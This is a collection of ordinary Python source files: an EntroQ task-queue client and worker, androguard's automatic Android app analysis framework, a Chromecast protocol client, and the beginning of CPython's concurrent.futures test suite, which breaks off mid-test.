def tasks(self, queue='', claimant_id='', task_ids=(), limit=0, omit_values=False): """Return task iter for tasks that match the given fields. Typically used to itemize a queue. Args: queue: queue name, if filtering on queue name, otherwise task_ids must be given. claimant_id: optional - if specified, limit to tasks claimed by this claimant. task_ids: optioanl - if specified, limit to a particular iterable of task IDs. limit: limit to this many results, all if 0. omit_values: only return metadata. Yields: A entroq_pb2.Task for each matching task. """ for tresp in self.stub.StreamTasks(entroq_pb2.TasksRequest( queue=queue, claimant_id=claimant_id, limit=limit, task_id=task_ids, omit_values=omit_values)): for task in tresp.Tasks: yield task def task_by_id(self, task_id, queue=''): tasks = list(self.tasks(queue=queue, task_ids=[task_id], limit=1)) if not tasks: raise ValueError("Task {task_id} not found".format(task_id=task_id)) return tasks[0] def try_claim(self, queue, duration_ms=30000): """Try to claim a task from the given queue, for the given duration. Args: queue: Name of queue to claim a task from. Or a list of queue names. duration_ms: Milliseconds that the claim should initially be good for. Returns: An entroq_pb2.Task if successful, or None if no task could be claimed. """ resp = self.stub.TryClaim(entroq_pb2.ClaimRequest( claimant_id=self.claimant_id, queues=queue if isinstance(queue, (list, tuple)) else [queue], duration_ms=duration_ms)) return resp.task def claim(self, queue, duration_ms=30000, poll_ms=30000): """Claim a task, blocking until one is available. Args: queue: Name of queue to claim a task from. duration_ms: Initial duration of task lease, in milliseconds. poll_ms: Time between checks if no claim is available, in milliseconds. Returns: An entroq_pb2.Task when successful. """ # TODO: time out after retry interval, reconnect and try again. resp = self.stub.Claim(entroq_pb2.ClaimRequest( claimant_id=self.claimant_id, queues=queue if isinstance(queue, (list, tuple)) else [queue], duration_ms=duration_ms, poll_ms=poll_ms)) return resp.task def modify(self, inserts=(), changes=(), deletes=(), depends=(), unsafe_claimant_id=None): """Attempt a modification of potentially multiple tasks and queues. Args: inserts: a list of entroq_pb2.TaskData to insert. changes: a list of entroq_pb2.TaskChange indicating alterations to tasks. deletes: a list of entroq_pb2.TaskID indicating which tasks to delete. depends: a list of entroq_pb2.TaskID that must exist for success. unsafe_claimant_id: sets the claimant ID to the given value. Use with extreme care. Default is safe. Raises: grpc.RpcError or, when we can get dependency information, DependencyError. Returns: (inserted_tasks, changed_tasks) - lists of entroq_pb2.Task. """ try: resp = self.stub.Modify(entroq_pb2.ModifyRequest( claimant_id=unsafe_claimant_id or self.claimant_id, inserts=inserts, changes=changes, deletes=deletes, depends=depends)) return resp.inserted, resp.changed except grpc.RpcError as e: raise DependencyError.from_exc(e) def delete(self, task_id, unsafe_claimant_id=None): """Attempt to delete the given task_id. Args: task_id: entroq_pb2.TaskID of the task to be deleted. unsafe_claimant_id: Specify to override claimant ID (e.g., to force deletion of a claimed task). Use with caution. """ self.modify(deletes=[task_id], unsafe_claimant_id=unsafe_claimant_id) def time(self): res = self.stub.Time(entroq_pb2.TimeRequest()) return res.time_ms def now(self): """Return now from the rough perspective of the server, in milliseconds.""" return int(time.time() * 1000) + self.time_skew def renew_for(self, task, duration=30): """Renew a task for a given number of seconds.""" _, chg = self.modify(changes=[ entroq_pb2.TaskChange( old_id=entroq_pb2.TaskID(id=task.id, version=task.version), new_data=entroq_pb2.TaskData(queue=task.queue, at_ms=self.now() + 1000 * duration, value=task.value)), ]) return chg[0] def do_with_renew(self, task, do_func, duration=30): """Calls do_func while renewing the given task. Args: task: The entroq_pb2.Task to attempt to renew. do_func: A function accepting a task and returning anything, to be called with this task while it is renewed in the background. duration: Claim duration in seconds. Returns: The (renewed task, do_func result). """ renew_interval = duration // 2 exit = threading.Event() lock = threading.Lock() renewed = task def renewer(): exit.wait(duration / 1000) while not exit.is_set(): _t = self.renew_for(task, duration=duration) with lock: renewed = _t exit.wait(duration / 1000) try: threading.Thread(target=renewer).start() result = do_func(task) with lock: return renewed, result finally: exit.set() def pop_all(self, queue, force=False): """Attempt to completely clear a queue. Claims from the queue, deleting everything it claims, until the queue is empty. Note that this must be called in a loop. Args: queue: The queue name to clear. force: If specified, will spoof the claimant for every task instead of claiming first. Yields: Each task that has been removed (entroq_pb2.Task). """ if force: for task in self.tasks(queue=queue): self.delete(unsafe_claimant_id=task.claimant_id, task_id=entroq_pb2.TaskID(id=task.id, version=task.version)) yield task return while not self.queue_empty(queue): task = self.claim(queue) self.modify(deletes=[entroq_pb2.TaskID(id=task.id, version=task.version)]) yield task class EQWorker: """Worker for claiming tasks from a given queue and running a given method.""" def __init__(self, eq): """Create a worker using the given EntroQ client. Args: eq: An EntroQ instance. """ self.eq = eq def work(self, queue, do_func, claim_duration=30): """Pull tasks from given queue, calling do_func, while renewing claims. This function never returns. If you want to run it in the background, start up a thrad with this as the target. Args: queue: The name of the queue to pull from, or a list of queues. do_func: The function to call. Accepts a single task argument and returns an entroq_pb2.ModifyRequest (no need to specify claimant ID). claim_duration: Seconds for which this claim should be renewed every renewal cycle. """ def fixup(renewed, tlist): for val in tlist: if val.id == renewed.id and val.version != renewed.version: if val.version > renewed.version: raise ValueError("Task updated inside worker body, version too high") val.version = renewed.version while True: task = self.eq.claim(queue, duration_ms=1000 * claim_duration) try: renewed, mod_req = self.eq.do_with_renew(task, do_func, duration=claim_duration) except DependencyError as e: logging.warn("Worker continuing after dependency: %s", e) continue if not mod_req: logging.info("No modification requested, continuing") continue if not (mod_req.inserts or mod_req.changes or mod_req.deletes): logging.info("No mutating modifications requested, continuing") continue fixup(renewed, mod_req.changes) fixup(renewed, mod_req.depends) fixup(renewed, mod_req.deletes) self.eq.modify(changes=mod_req.changes, inserts=mod_req.inserts, depends=mod_req.depends, deletes=mod_req.deletes)
auto.py
from future import standard_library standard_library.install_aliases() from builtins import range from builtins import object import os import queue import threading import time import zlib from androguard.core import androconf from androguard.core.bytecodes import apk, dvm from androguard.core.analysis import analysis from androguard.util import read import logging log = logging.getLogger("androguard.auto") class AndroAuto(object): """ The main class which analyse automatically android apps by calling methods from a specific object :param settings: the settings of the analysis :type settings: dict """ def __init__(self, settings): self.settings = settings def dump(self): """ Dump the analysis """ self.settings["my"].dump() def dump_file(self, filename): """ Dump the analysis in a filename """ self.settings["my"].dump_file(filename) def go(self): """ Launch the analysis """ myandro = self.settings["my"] def worker(idx, q): log.debug("Running worker-%d" % idx) while True: a, d, dx, axmlobj, arscobj = None, None, None, None, None try: filename, fileraw = q.get() id_file = zlib.adler32(fileraw) log.debug("(worker-%d) get %s %d" % (idx, filename, id_file)) log = self.settings["log"](id_file, filename) is_analysis_dex, is_analysis_adex = True, True log.debug("(worker-%d) filtering file %d" % (idx, id_file)) filter_file_ret, filter_file_type = myandro.filter_file( log, fileraw) if filter_file_ret: log.debug("(worker-%d) analysis %s" % (id_file, filter_file_type)) if filter_file_type == "APK": a = myandro.create_apk(log, fileraw) is_analysis_dex = myandro.analysis_apk(log, a) fileraw = a.get_dex() filter_file_type = androconf.is_android_raw(fileraw) elif filter_file_type == "AXML": axmlobj = myandro.create_axml(log, fileraw) myandro.analysis_axml(log, axmlobj) elif filter_file_type == "ARSC": arscobj = myandro.create_arsc(log, fileraw) myandro.analysis_arsc(log, arscobj) if is_analysis_dex and filter_file_type == "DEX": d = myandro.create_dex(log, fileraw) is_analysis_adex = myandro.analysis_dex(log, d) elif is_analysis_dex and filter_file_type == "DEY": d = myandro.create_dey(log, fileraw) is_analysis_adex = myandro.analysis_dey(log, d) if is_analysis_adex and d: dx = myandro.create_adex(log, d) myandro.analysis_adex(log, dx) myandro.analysis_app(log, a, d, dx) myandro.finish(log) except Exception as why: myandro.crash(log, why) myandro.finish(log) del a, d, dx, axmlobj, arscobj q.task_done() q = queue.Queue(self.settings["max_fetcher"]) for i in range(self.settings["max_fetcher"]): t = threading.Thread(target=worker, args=[i, q]) t.daemon = True t.start() terminated = True while terminated: terminated = myandro.fetcher(q) try: if terminated: time.sleep(10) except KeyboardInterrupt: terminated = False q.join() class DefaultAndroAnalysis(object): """ This class can be used as a template in order to analyse apps """ def fetcher(self, q): """ This method is called to fetch a new app in order to analyse it. The queue must be fill with the following format: (filename, raw) :param q: the Queue to put new app """ pass def filter_file(self, log, fileraw): """ This method is called in order to filer a specific app :param log: an object which corresponds to a unique app :param fileraw: the raw app (a string) :rtype: a set with 2 elements, the return value (boolean) if it is necessary to continue the analysis and the file type """ file_type = androconf.is_android_raw(fileraw) if file_type == "APK" or file_type == "DEX" or file_type == "DEY" or file_type == "AXML" or file_type == "ARSC": return True, file_type return False, None def create_axml(self, log, fileraw): """ This method is called in order to create a new AXML object :param log: an object which corresponds to a unique app :param fileraw: the raw axml (a string) :rtype: an :class:`APK` object """ return apk.AXMLPrinter(fileraw) def create_arsc(self, log, fileraw): """ This method is called in order to create a new ARSC object :param log: an object which corresponds to a unique app :param fileraw: the raw arsc (a string) :rtype: an :class:`APK` object """ return apk.ARSCParser(fileraw) def create_apk(self, log, fileraw): """ This method is called in order to create a new APK object :param log: an object which corresponds to a unique app :param fileraw: the raw apk (a string) :rtype: an :class:`APK` object """ return apk.APK(fileraw, raw=True) def create_dex(self, log, dexraw): """ This method is called in order to create a DalvikVMFormat object :param log: an object which corresponds to a unique app :param dexraw: the raw classes.dex (a string) :rtype: a :class:`DalvikVMFormat` object """ return dvm.DalvikVMFormat(dexraw) def create_dey(self, log, dexraw): """ This method is called in order to create a DalvikOdexVMFormat object :param log: an object which corresponds to a unique app :param dexraw: the raw odex file (a string) :rtype: a :class:`DalvikOdexVMFormat` object """ return dvm.DalvikOdexVMFormat(dexraw) def create_adex(self, log, dexobj): """ This method is called in order to create a VMAnalysis object :param log: an object which corresponds to a unique app :param dexobj: a :class:`DalvikVMFormat` object :rytpe: a :class:`Analysis` object """ vm_analysis = analysis.Analysis(dexobj) vm_analysis.create_xref() return vm_analysis def analysis_axml(self, log, axmlobj): """ This method is called in order to know if the analysis must continue :param log: an object which corresponds to a unique app :param axmlobj: a :class:`AXMLPrinter` object :rtype: a boolean """ return True def analysis_arsc(self, log, arscobj): """ This method is called in order to know if the analysis must continue :param log: an object which corresponds to a unique app :param arscobj: a :class:`ARSCParser` object :rtype: a boolean """ return True def analysis_apk(self, log, apkobj): """ This method is called in order to know if the analysis must continue :param log: an object which corresponds to a unique app :param apkobj: a :class:`APK` object :rtype: a boolean """ return True def analysis_dex(self, log, dexobj): """ This method is called in order to know if the analysis must continue :param log: an object which corresponds to a unique app :param dexobj: a :class:`DalvikVMFormat` object :rtype: a boolean """ return True def analysis_dey(self, log, deyobj): """ This method is called in order to know if the analysis must continue :param log: an object which corresponds to a unique app :param deyobj: a :class:`DalvikOdexVMFormat` object :rtype: a boolean """ return True def analysis_adex(self, log, adexobj): """ This method is called in order to know if the analysis must continue :param log: an object which corresponds to a unique app :param adexobj: a :class:`VMAnalysis` object :rtype: a boolean """ return True def analysis_app(self, log, apkobj, dexobj, adexobj): """ This method is called if you wish to analyse the final app :param log: an object which corresponds to a unique app :param apkobj: a :class:`APK` object :param dexobj: a :class:`DalvikVMFormat` object :param adexobj: a :class:`VMAnalysis` object """ pass def finish(self, log): """ This method is called before the end of the analysis :param log: an object which corresponds to a unique app """ pass def crash(self, log, why): """ This method is called if a crash appends :param log: an object which corresponds to a unique app :param why: the string exception """ pass def dump(self): """ This method is called to dump the result """ pass def dump_file(self, filename): """ This method is called to dump the result in a file :param filename: the filename to dump the result """ pass class DirectoryAndroAnalysis(DefaultAndroAnalysis): """ A simple class example to analyse a directory """ def __init__(self, directory): self.directory = directory def fetcher(self, q): for root, dirs, files in os.walk(self.directory, followlinks=True): if files: for f in files: real_filename = root if real_filename[-1] != "/": real_filename += "/" real_filename += f q.put((real_filename, read(real_filename))) return False
chromecast.py
import json import logging from random import randint from select import select from struct import pack, unpack, unpack_from import socket import ssl from threading import Thread, Event try: from queue import Queue, Empty except ImportError: from Queue import Queue, Empty CONNECTION_NS = "urn:x-cast:com.google.cast.tp.connection" HEARTBEAT_NS = 'urn:x-cast:com.google.cast.tp.heartbeat' RECEIVER_NS = 'urn:x-cast:com.google.cast.receiver' AUTH_NS = 'urn:x-cast:com.google.cast.tp.deviceauth' MEDIA_NS = 'urn:x-cast:com.google.cast.media' PLATFORM_DEST = 'receiver-0' class ProtoBuff(object): PROTOCOL_VERSION = 0 TYPE_ENUM = 0 TYPE_STRING = 2 TYPE_BYTES = TYPE_STRING TYPE_NAMES = { 0: 'String', 1: 'Binary' } def __init__(self, **kwargs): self.protocol = kwargs.get('protocol', self.PROTOCOL_VERSION) self.source_id = kwargs.get('source_id', 'source-0') self.destination_id = kwargs.get('destination_id', PLATFORM_DEST) self.namespace = kwargs.get('namespace', CONNECTION_NS) self.type = kwargs.get('type', 0) self.data = kwargs.get('data', '') if 'json' in kwargs: self.from_json(kwargs['json']) if 'msg' in kwargs: self.from_string(kwargs['msg'], kwargs.get('msg_len', len(kwargs['msg']))) @staticmethod def _pack_type(field_id, t): return (field_id << 3) | t @staticmethod def _unpack_type(val): return val >> 3, val & 0x7 @staticmethod def _data_length(s): x = b"" l = len(s) while (l > 0x7F): x += pack("B", l & 0x7F | 0x80) l >>= 7 x += pack("B", l & 0x7F) return x @staticmethod def _unpack_varint(bytes): """ Convert a varint to an integer. :param bytes: Bytes containing the varint. :return: integer """ value = 0 base = 1 rd = 0 for raw_byte in bytes: val_byte = ord(raw_byte) if type(raw_byte) != int else raw_byte rd += 1 value += (val_byte & 0x7f) * base if (val_byte & 0x80): # The MSB was set; increase the base and iterate again, continuing # to calculate the value. base *= 128 else: break return value, rd def _pack_string(self, n, the_str): sl = len(the_str) return pack(">BB%ds" % sl, self._pack_type(n, self.TYPE_STRING), sl, the_str.encode()) @staticmethod def _unpack_string(buff): slen = unpack_from(">B", buff, 0)[0] ss = unpack(">%ds" % slen, buff[1:1+slen])[0] return ss, slen + 1 def as_string(self): _msg = pack(">BB", self._pack_type(1, self.TYPE_ENUM), self.PROTOCOL_VERSION) _msg += self._pack_string(2, self.source_id) _msg += self._pack_string(3, self.destination_id) _msg += self._pack_string(4, self.namespace) _msg += pack(">BB", self._pack_type(5, self.TYPE_ENUM), self.type) _msg += pack(">B", self._pack_type(6, self.TYPE_BYTES)) _msg_len = self._data_length(self.data) _msg += pack(">%ds" % len(_msg_len), _msg_len) _msg += pack(">%ds" % len(self.data), self.data.encode()) return pack(">I%ds" % (len(_msg)), len(_msg), _msg) def from_string(self, bytes, blen): pos = 0 while pos < blen: a = unpack_from(">B", bytes, pos)[0] n, ct = self._unpack_type(a) pos += 1 if n == 1: self.protocol = unpack_from(">B", bytes, pos)[0] pos += 1 elif n == 2: self.source_id, rd = self._unpack_string(bytes[pos:]) pos += rd elif n == 3: self.destination_id, rd = self._unpack_string(bytes[pos:]) pos += rd elif n == 4: self.namespace, rd = self._unpack_string(bytes[pos:]) pos += rd elif n == 5: self.type = unpack_from(">B", bytes, pos)[0] pos += 1 elif n == 6: # utf-8 payload slen, rd = self._unpack_varint(bytes[pos:]) pos += rd self.data = unpack(">%ds" % slen, bytes[pos:pos + slen])[0] pos += slen elif n == 7: # binary payload slen, rd = self._unpack_varint(bytes[pos:]) pos += rd self.data = unpack_from(">%dB" % slen, bytes, pos)[0] pos += slen else: print("n = {}".format(n)) break def as_json(self): if self.type == 0: return json.loads(self.data.decode()) def from_json(self, json_data): self.data = json.dumps(json_data) def dump(self): """ Dump info to stdout... """ print(" Protocol Version: {}".format(self.protocol)) print(" Source ID: {}".format(self.source_id)) print(" Desination ID: {}".format(self.destination_id)) print(" Namespace: {}".format(self.namespace)) print(" Type: {} [{}]".format(self.TYPE_NAMES[self.type], self.type)) print(" Data: {}".format(self.data)) class ChromecastClient(object): """ Class to communicate with a Chromecast device. In order to communicate a virtual connection is required, estblished by using the connect() function. Once established the Chromecast will send a PING request, which must be answered with a PONG reply or the connection will be closed. Useful links: - https://developers.google.com/cast/docs/reference/messages """ DEFAULT_MEDIA_APP = 'CC1AD845' def __init__(self, host, port=8009): self.logger = logging.getLogger() self.req_id = None self.volume = 0 self.muted = False self.stadby = True self.active = False self.host = host self.port = port self.sessions = {} self.sessions_updated = Event() self.available_apps = set() self.apps_available = Event() self.connected = False self.socket = None self.input = Queue() self.output = Queue() self.running = False self.comm_thread = None self.switch_thread = None self.heartbeat = HeartbeatReceiver(self) self.responses = {} self.events = {} def start(self): if self.running is True: return self.socket = ssl.wrap_socket(socket.socket()) self.socket.settimeout(10) try: self.socket.connect((str(self.host), self.port)) except socket.gaierror as e: self.logger.warning("Unable to connect to device. %s", e) return self.running = True self.switch_thread = Thread(target=self.switchboard) self.switch_thread.daemon = True self.switch_thread.start() self.comm_thread = Thread(target=self.communicator) self.comm_thread.daemon = True self.comm_thread.start() self.connect() self.get_app_availability(self.DEFAULT_MEDIA_APP) def stop(self): self.running = False def register_event(self, request_id): ev = Event() self.events[request_id] = ev return ev def unregister_event(self, request_id): if request_id not in self.events: return del self.events[request_id] def communicator(self): _buffer = b'' while self.running: w = [self.socket] if self.output.not_empty else [] _r, _w, _e = select([self.socket], w, [self.socket], 10) if len(_e): break if len(_r) > 0: _buffer += self.socket.recv(2048) if len(_w) > 0: try: pb = self.output.get_nowait() # if pb.namespace != HEARTBEAT_NS: # print(">>>>>>>>>>>>>>") # pb.dump() wl = self.socket.write(pb.as_string()) self.output.task_done() except Empty: pass if len(_buffer) >= 4: plen = unpack(">I", _buffer[:4])[0] if len(_buffer) >= plen + 4: self.accept_message(_buffer[4:4 + plen], plen) _buffer = _buffer[4 + plen:] def switchboard(self): while self.running: pb = self.input.get() self.input.task_done() if pb.namespace == HEARTBEAT_NS: self.heartbeat.process_message(pb) continue # print("<<<<<<<<<<<<<<") # pb.dump() msg = pb.as_json() if pb.namespace == CONNECTION_NS: if msg.get('type') == 'CLOSE': if pb.source_id in self.sessions: self.sessions[pb.source_id].connected = False continue if pb.namespace == MEDIA_NS and pb.destination_id == '*': sess = self.sessions.get(pb.source_id) if sess is not None: sess.update_media_status(pb.as_json()) if msg.get('requestId') in self.events: self.responses[msg['requestId']] = pb self.events[msg['requestId']].set() def put_and_wait(self, pb, payload, timeout=10): req_id = self.request_id payload['requestId'] = req_id ev = self.register_event(req_id) pb.from_json(payload) self.output.put(pb) rv = ev.wait(timeout) self.unregister_event(req_id) if rv and req_id in self.responses: rv = self.responses[req_id] del self.responses[req_id] return rv def accept_message(self, bytes, blen): pb = ProtoBuff(msg=bytes, msg_len=blen) self.input.put(pb) @property def request_id(self): if self.req_id is None: self.req_id = randint(1000000, 80000000) self.req_id += 1 return self.req_id def stop_apps(self): for sess in self.sessions.values(): self.put_and_wait(ProtoBuff(namespace=RECEIVER_NS), {'type': 'STOP', 'sessionId': sess.session_id}) sess.disconnect() del self.sessions[sess.session_id] def connect(self): self.output.put(ProtoBuff(data="{\"type\":\"CONNECT\"}")) def get_status(self): self.put_and_wait(ProtoBuff(namespace=RECEIVER_NS), {'type': 'GET_STATUS'}) def get_app_availability(self, *apps): """ Enquire whether one or more apps are available on the Chromecast. We use the cached list wherever possible and block until we have an answer. :param apps: One or more app names or ids to search for. :return: Dict with each app requested as a True/False. """ if len(apps) == 0: return toask = [a for a in apps if a not in self.available_apps] if len(toask) > 0: payload = {'type': 'GET_APP_AVAILABILITY', 'appId': toask} resp = self.put_and_wait(ProtoBuff(namespace=RECEIVER_NS), payload) if resp is not False: data = resp.as_json() for app in data.get('availability', []): if data['availability'][app] == 'APP_AVAILABLE': self.available_apps.add(app) return {a: a in self.available_apps for a in apps} def launch_app(self, app_id=None, block=True): payload = {'type': 'LAUNCH', 'appId': app_id or self.DEFAULT_MEDIA_APP} resp = self.put_and_wait(ProtoBuff(namespace=RECEIVER_NS), payload) if resp is False: return None app_data = resp.as_json().get('status').get('applications')[0] if 'transportId' not in app_data: print("The app has been loaded but does not use the cast API.") return None sess = ChromecastSession(self, app_data) self.sessions[app_data['transportId']] = sess return sess def update_status(self, pb): msg = pb.as_json() self.volume = msg['status']['volume']['level'] self.muted = msg['status']['volume']['muted'] self.standby = msg['status']['isStandBy'] self.active = msg['status'].get('isActiveInput', False) if 'applications' in msg['status']: for app in msg['status']['applications']: if app['sessionId'] not in self.sessions: self.sessions[app['sessionId']] = ChromecastSession(self, app) else: self.sessions[app['sessionId']].update(app) self.sessions_updated.set() class ChromecastSession(object): """ Class to contain details of a session on a Chromecast. """ def __init__(self, client, data): self.client = client self.app_id = data['appId'] self.display_name = data['displayName'] self.namespaces = [ns['name'] for ns in data.get('namespaces', [])] self.session_id = data['sessionId'] self.status = data['statusText'] self.transport_id = data.get('transportId', None) self.connected = False self.media_loaded = False self.media_position = 0 self.media_status = '' self.media_session_id = 0 self.media_finished = False @property def uses_cast_api(self): return self.transport_id is not None def connect(self): if self.transport_id is None: return self.client.output.put(ProtoBuff(namespace=CONNECTION_NS, destination_id=self.transport_id, json={'type': 'CONNECT'})) ck = self.client.put_and_wait(ProtoBuff(namespace=MEDIA_NS, destination_id=self.transport_id), {'type': 'GET_STATUS'}) self.connected = ck is not False def disconnect(self): if not self.connected: return self.client.output.put(ProtoBuff(namespace=CONNECTION_NS, destination_id=self.transport_id, json={'type': 'CLOSE'})) def get_media_status(self): if not self.connected or not self.media_loaded: return update = self.client.put_and_wait(ProtoBuff(namespace=MEDIA_NS, destination_id=self.transport_id), {'type': 'GET_STATUS'}) if update is not False: self.update_media_status(update.as_json()) def update_media_status(self, data): """ This can be called from the parent (if the update was broadcast) or from get_media_status(). :param data: The update data. """ if data.get('type') != 'MEDIA_STATUS': return status = data.get('status', {}) if isinstance(status, list): if len(status) == 0: return status = status[0] self.media_session_id = status.get('mediaSessionId') self.media_status = status.get('playerState') self.media_position = status.get('currentTime') if 'idleReason' in status: self.media_finished = True def get_status(self): update = self.client.put_and_wait(ProtoBuff(namespace=self.namespaces[0], destination_id=elf.transport_id), {'type': 'GET_STATUS', 'mediaSessionId': self.session_id}) print(update.as_json()) def load_movie(self, url, ct, duration=None): if not self.connected: return payload = {'type': 'LOAD', 'media': {'contentId': url, 'contentType': ct, 'streamType': 'BUFFERING'}, 'autoplay': False } if duration is not None: payload['media']['duration'] = duration resp = self.client.put_and_wait(ProtoBuff(namespace=self.namespaces[0], destination_id=self.transport_id), payload, 15) if resp is False: print("Chromecast is unable to load media?") self.media_loaded = False return False self.media_loaded = True self.get_media_status() return True def play_media(self): if not self.media_loaded: return payload = {'type': 'PLAY', 'mediaSessionId': self.media_session_id} resp = self.client.put_and_wait(ProtoBuff(namespace=self.namespaces[0], destination_id=self.transport_id), payload) return resp is not False class ChromecastReceiver(object): def __init__(self, client, **kwargs): self.client = client self.namespace = kwargs.get('namespace') self.source = kwargs.get('source_id') self.dest = kwargs.get('destination_id') self.namespace = kwargs.get('namespace') def update_from_message(self, pb): if self.source is None: self.source = pb.source_id if self.dest is None: self.dest = pb.destination_id if self.namespace is None: self.namespace = pb.namespace def process_message(self, pb): self.update_from_message(pb) msg = pb.as_json() class HeartbeatReceiver(ChromecastReceiver): def __init__(self, client, **kwargs): ChromecastReceiver.__init__(self, client, **kwargs) def process_message(self, pb): self.update_from_message(pb) msg = pb.as_json() if 'type' in msg and msg['type'] == 'PING': self.client.output.put(ProtoBuff(source_id=self.source, destination_id=self.dest, namespace=self.namespace, json={'type': 'PONG'}))
test_concurrent_futures.py
import test.support # Skip tests if _multiprocessing wasn't built. test.support.import_module('_multiprocessing') # Skip tests if sem_open implementation is broken. test.support.import_module('multiprocessing.synchronize') from test.support.script_helper import assert_python_ok import contextlib import itertools import logging from logging.handlers import QueueHandler import os import queue import sys import threading import time import unittest import weakref from pickle import PicklingError from concurrent import futures from concurrent.futures._base import ( PENDING, RUNNING, CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED, Future, BrokenExecutor) from concurrent.futures.process import BrokenProcessPool from multiprocessing import get_context import multiprocessing.util def create_future(state=PENDING, exception=None, result=None): f = Future() f._state = state f._exception = exception f._result = result return f PENDING_FUTURE = create_future(state=PENDING) RUNNING_FUTURE = create_future(state=RUNNING) CANCELLED_FUTURE = create_future(state=CANCELLED) CANCELLED_AND_NOTIFIED_FUTURE = create_future(state=CANCELLED_AND_NOTIFIED) EXCEPTION_FUTURE = create_future(state=FINISHED, exception=OSError()) SUCCESSFUL_FUTURE = create_future(state=FINISHED, result=42) INITIALIZER_STATUS = 'uninitialized' def mul(x, y): return x * y def capture(*args, **kwargs): return args, kwargs def sleep_and_raise(t): time.sleep(t) raise Exception('this is an exception') def sleep_and_print(t, msg): time.sleep(t) print(msg) sys.stdout.flush() def init(x): global INITIALIZER_STATUS INITIALIZER_STATUS = x def get_init_status(): return INITIALIZER_STATUS def init_fail(log_queue=None): if log_queue is not None: logger = logging.getLogger('concurrent.futures') logger.addHandler(QueueHandler(log_queue)) logger.setLevel('CRITICAL') logger.propagate = False time.sleep(0.1) # let some futures be scheduled raise ValueError('error in initializer') class MyObject(object): def my_method(self): pass class EventfulGCObj(): def __init__(self, mgr): self.event = mgr.Event() def __del__(self): self.event.set() def make_dummy_object(_): return MyObject() class BaseTestCase(unittest.TestCase): def setUp(self): self._thread_key = test.support.threading_setup() def tearDown(self): test.support.reap_children() test.support.threading_cleanup(*self._thread_key) class ExecutorMixin: worker_count = 5 executor_kwargs = {} def setUp(self): super().setUp() self.t1 = time.monotonic() if hasattr(self, "ctx"): self.executor = self.executor_type( max_workers=self.worker_count, mp_context=self.get_context(), **self.executor_kwargs) else: self.executor = self.executor_type( max_workers=self.worker_count, **self.executor_kwargs) self._prime_executor() def tearDown(self): self.executor.shutdown(wait=True) self.executor = None dt = time.monotonic() - self.t1 if test.support.verbose: print("%.2fs" % dt, end=' ') self.assertLess(dt, 300, "synchronization issue: test lasted too long") super().tearDown() def get_context(self): return get_context(self.ctx) def _prime_executor(self): # Make sure that the executor is ready to do work before running the # tests. This should reduce the probability of timeouts in the tests. futures = [self.executor.submit(time.sleep, 0.1) for _ in range(self.worker_count)] for f in futures: f.result() class ThreadPoolMixin(ExecutorMixin): executor_type = futures.ThreadPoolExecutor class ProcessPoolForkMixin(ExecutorMixin): executor_type = futures.ProcessPoolExecutor ctx = "fork" def get_context(self): if sys.platform == "win32": self.skipTest("require unix system") return super().get_context() class ProcessPoolSpawnMixin(ExecutorMixin): executor_type = futures.ProcessPoolExecutor ctx = "spawn" class ProcessPoolForkserverMixin(ExecutorMixin): executor_type = futures.ProcessPoolExecutor ctx = "forkserver" def get_context(self): if sys.platform == "win32": self.skipTest("require unix system") return super().get_context() def create_executor_tests(mixin, bases=(BaseTestCase,), executor_mixins=(ThreadPoolMixin, ProcessPoolForkMixin, ProcessPoolForkserverMixin, ProcessPoolSpawnMixin)): def strip_mixin(name): if name.endswith(('Mixin', 'Tests')): return name[:-5] elif name.endswith('Test'): return name[:-4] else: return name for exe in executor_mixins: name = ("%s%sTest" % (strip_mixin(exe.__name__), strip_mixin(mixin.__name__))) cls = type(name, (mixin,) + (exe,) + bases, {}) globals()[name] = cls class InitializerMixin(ExecutorMixin): worker_count = 2 def setUp(self): global INITIALIZER_STATUS INITIALIZER_STATUS = 'uninitialized' self.executor_kwargs = dict(initializer=init, initargs=('initialized',)) super().setUp() def test_initializer(self): futures = [self.executor.submit(get_init_status) for _ in range(self.worker_count)] for f in futures: self.assertEqual(f.result(), 'initialized') class FailingInitializerMixin(ExecutorMixin): worker_count = 2 def setUp(self): if hasattr(self, "ctx"): # Pass a queue to redirect the child's logging output self.mp_context = self.get_context() self.log_queue = self.mp_context.Queue() self.executor_kwargs = dict(initializer=init_fail, initargs=(self.log_queue,)) else: # In a thread pool, the child shares our logging setup # (see _assert_logged()) self.mp_context = None self.log_queue = None self.executor_kwargs = dict(initializer=init_fail) super().setUp() def test_initializer(self): with self._assert_logged('ValueError: error in initializer'): try: future = self.executor.submit(get_init_status) except BrokenExecutor: # Perhaps the executor is already broken pass else: with self.assertRaises(BrokenExecutor): future.result() # At some point, the executor should break t1 = time.monotonic() while not self.executor._broken: if time.monotonic() - t1 > 5: self.fail("executor not broken after 5 s.") time.sleep(0.01) # ... and from this point submit() is guaranteed to fail with self.assertRaises(BrokenExecutor): self.executor.submit(get_init_status) def _prime_executor(self): pass @contextlib.contextmanager def _assert_logged(self, msg): if self.log_queue is not None: yield output = [] try: while True: output.append(self.log_queue.get_nowait().getMessage()) except queue.Empty: pass else: with self.assertLogs('concurrent.futures', 'CRITICAL') as cm: yield output = cm.output self.assertTrue(any(msg in line for line in output), output) create_executor_tests(InitializerMixin) create_executor_tests(FailingInitializerMixin) class ExecutorShutdownTest: def test_run_after_shutdown(self): self.executor.shutdown() self.assertRaises(RuntimeError, self.executor.submit, pow, 2, 5) def test_interpreter_shutdown(self): # Test the atexit hook for shutdown of worker threads and processes rc, out, err = assert_python_ok('-c', """if 1: from concurrent.futures import {executor_type} from time import sleep from test.test_concurrent_futures import sleep_and_print if __name__ == "__main__": context = '{context}' if context == "": t = {executor_type}(5) else: from multiprocessing import get_context context = get_context(context) t = {executor_type}(5, mp_context=context) t.submit(sleep_and_print, 1.0, "apple") """.format(executor_type=self.executor_type.__name__, context=getattr(self, "ctx", ""))) # Errors in atexit hooks don't change the process exit code, check # stderr manually. self.assertFalse(err) self.assertEqual(out.strip(), b"apple") def test_submit_after_interpreter_shutdown(self): # Test the atexit hook for shutdown of worker threads and processes rc, out, err = assert_python_ok('-c', """if 1: import atexit @atexit.register def run_last(): try: t.submit(id, None) except RuntimeError: print("runtime-error") raise from concurrent.futures import {executor_type} if __name__ == "__main__": context = '{context}' if not context: t = {executor_type}(5) else: from multiprocessing import get_context context = get_context(context) t = {executor_type}(5, mp_context=context) t.submit(id, 42).result() """.format(executor_type=self.executor_type.__name__, context=getattr(self, "ctx", ""))) # Errors in atexit hooks don't change the process exit code, check # stderr manually. self.assertIn("RuntimeError: cannot schedule new futures", err.decode()) self.assertEqual(out.strip(), b"runtime-error") def test_hang_issue12364(self): fs = 